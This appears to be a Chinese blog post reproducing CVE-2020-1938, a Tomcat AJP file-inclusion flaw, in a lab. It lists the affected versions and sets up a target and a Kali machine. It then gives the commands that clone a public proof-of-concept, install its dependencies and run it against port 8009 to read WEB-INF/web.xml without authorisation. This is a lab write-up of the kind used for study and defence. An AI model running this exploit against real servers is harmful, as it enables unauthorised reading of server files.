CVE-2020-1938漏洞复现

CVE-2020-1938漏洞复现

简介

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。
由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

漏洞影响

Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x

前期准备

centos一台(IP:192.168.139.126)
在这里插入图片描述

Tomcat正常启动且开启了AJP Connector 服务端口
在这里插入图片描述
kali linux一台,使其能访问192.168.139.126:8080
在这里插入图片描述
并做如下配置

gohb@gohb:~/桌面$ git clone https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC.git
#下载poc文件
gohb@gohb:~/桌面$ cd CNVD-2020-10487-Tomcat-ajp-POC/
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ ls
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ cat requirements.txt
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install ajpy==0.0.4 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install  colorama==0.4.3 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install colorlog==4.1.0 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
#下载poc文件运行相关依赖包
#或者尝试这样gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
#小编是因为直接下载报错所以不得不逐条下载

开始实验

gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ python poc.py -p 8009 -f "/WEB-INF/web.xml" 192.168.139.126

在非授权条件下,成功访问到的WEB-INF下的web.xml
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值